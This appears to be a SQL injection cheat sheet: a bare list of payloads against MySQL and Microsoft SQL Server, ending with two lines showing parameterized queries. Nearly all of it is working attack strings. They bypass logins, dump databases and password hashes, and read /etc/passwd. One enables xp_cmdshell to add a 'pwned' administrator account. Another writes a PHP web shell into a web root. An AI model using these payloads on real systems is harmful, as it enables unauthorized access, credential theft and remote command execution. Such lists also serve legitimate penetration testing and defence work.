2' or '1'='1 ' or 1=1 -- a' or 1=1 -- " or 1=1 -- a" or 1=1 -- ' or 1=1 # " or 1=1 # or 1=1 -- ' or 'x'='x " or "x"="x ') or ('x'='x ") or ("x"="x ' or username LIKE '%admin%
' or ( 1=1 and username='admin'); admin' -- %bf%27 or 1=1 --
1002' or '1'='1 1002' and '1'='1 1002' and '1'='2
XX'; WAITFOR DELAY '0:0:5'--
EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
';exec master..xp_cmdshell 'ping -n 5 127.0.0.1'; --
';exec master..xp_cmdshell 'net user pwned 1234 /ADD && net localgroup administrators pwned /ADD'; --
1002' ORDER BY 1-- 1002' ORDER BY 2-- 1002' ORDER BY 3--
1002' UNION ALL SELECT null,NULL,NULL,NULL--
ID=1002' UNION ALL SELECT NULL,+ISNULL(CAST(@@VERSION AS NVARCHAR(4000)),CHAR(32)),NULL,NULL-- ID=1002' UNION ALL SELECT NULL,+ISNULL(CAST(HOST_NAME() AS NVARCHAR(4000)),CHAR(32)),NULL,NULL-- ID=1002' UNION ALL SELECT NULL,+ISNULL(CAST(INJECTED_FUNCTION AS NVARCHAR(4000)),CHAR(32)),NULL,NULL-- DB_NAME() user_name(); system_user
1002' UNION ALL SELECT NULL,CHAR(113)+ISNULL(CAST(name AS NVARCHAR(4000)),CHAR(32))+CHAR(98)+ISNULL(CAST(master.dbo.fn_varbintohexstr(password) AS NVARCHAR(4000)),CHAR(32))+CHAR(113),NULL,NULL FROM master..sysxlogins--
convert(int,user_name())-- convert(int, @@db_name())--
SELECT Distinct TABLE_NAME FROM information_schema.TABLES exec master.dbo.xp_cmdshell 'CMD'
and 1=1 and 1=2
AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)=109
and if(substring (user(),1,1)=’a’,SLEEP(5),1)--”
and IF(SUBSTRING ((select 1 from admin limit 0,1),1,1)=1,SLEEP(5),1)
vuln.php?id=1 order by 9 # This throws no error vuln.php?id=1 order by 10 # This throws error
UNION SELECT @@version,NULL, NULL#'
UNION SELECT table_schema,NULL,NULL FROM information_schema.columns#'
AND 1=0 UNION SELECT LOAD_FILE('C:\\boot.ini'),NULL,NULL #'
AND 1=0 UNION SELECT 'bad content',NULL,NULL INTO OUTFILE 'C:\\random_file.txt' #'
-1 union all select @@version -- 1 union SELECT user FROM mysql.user 1 union select 'foo' into outfile '/tmp/foo' 1 union select load_file('/etc/passwd')
or 1=1 vs or 1=2 and 1=2 vs and 1=1
id=1 union all select 1 id=1 union all select 1,2 id=1 union all select 1,2,3 ...
?id=1 union all select 1,2,3,4,5 from XXX Table 'gallery.XXX' doesn't existCould not select category
id=1 union all (select 1,2,3,4,5,6 from mysql.user)#
1 union (select password,2,3,4,5,6 from mysql.user)#
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '*47FB3B1E573D80F44CD198DC65DE7764795F948E) order by dateuploaded desc limit 1' at line 1
SELECT user(); SELECT system_user();
SELECT user FROM mysql.user;
SELECT host, user, password FROM mysql.user;
SELECT schema_name FROM information_schema.schemata; SELECT distinct(db) FROM mysql.db
SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’
SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’
aa' UNION SELECT count(*), users.password FROM users; --
aa' UNION SELECT users.password, users.password FROM users LIMIT 1; --
aa' UNION SELECT users.password, users.password FROM users LIMIT 1 OFFSET 1; --
aa' UNION SELECT users.password, users.password FROM users LIMIT 1 OFFSET 2; --
' or 'x'='x' order by 1 desc -- ' or 'x'='x' order by 2 desc -- ...
?id=1 union select 1,2,3,4,user(),6,7,8,9
?id=1 union select 1,2,3,4,version(),6,7,8,9
?=1 union select 1,2,3,4,table_name,6,7,8,9 from information_schema.tables
?id=1 union select 1,2,3,4,column_name,6,7,8,9 from information_schema.columns where table_name = 'users'
id=1 union select 1,2,3,4,concat(name,0x3a,password),6,7,8,9 FROM users
?id=1 union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6,7,8,9 into OUTFILE 'c:/xampp/htdocs/cmd.php'
-' ' ' '&' '^' '*' ' or ''-' ' or '' ' ' or ''&' ' or ''^' ' or ''*' "-" " " "&" "^" "*" " or ""-" " or "" " " or ""&" " or ""^" " or ""*" or true-- " or true-- ' or true-- ") or true-- ') or true-- ' or 'x'='x ') or ('x')=('x ')) or (('x'))=(('x " or "x"="x ") or ("x")=("x ")) or (("x"))=(("x
\' \" OR 1--
"SELECT * FROM foo WHERE bar = ? ".setString( 1, var);
connection.prepareCall("{call sp_getAccountBalance(?)}").setString(1, custname);